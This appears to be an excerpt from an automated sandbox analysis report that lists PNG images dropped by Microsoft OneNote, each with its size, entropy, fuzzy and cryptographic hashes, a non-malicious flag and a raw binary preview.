                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
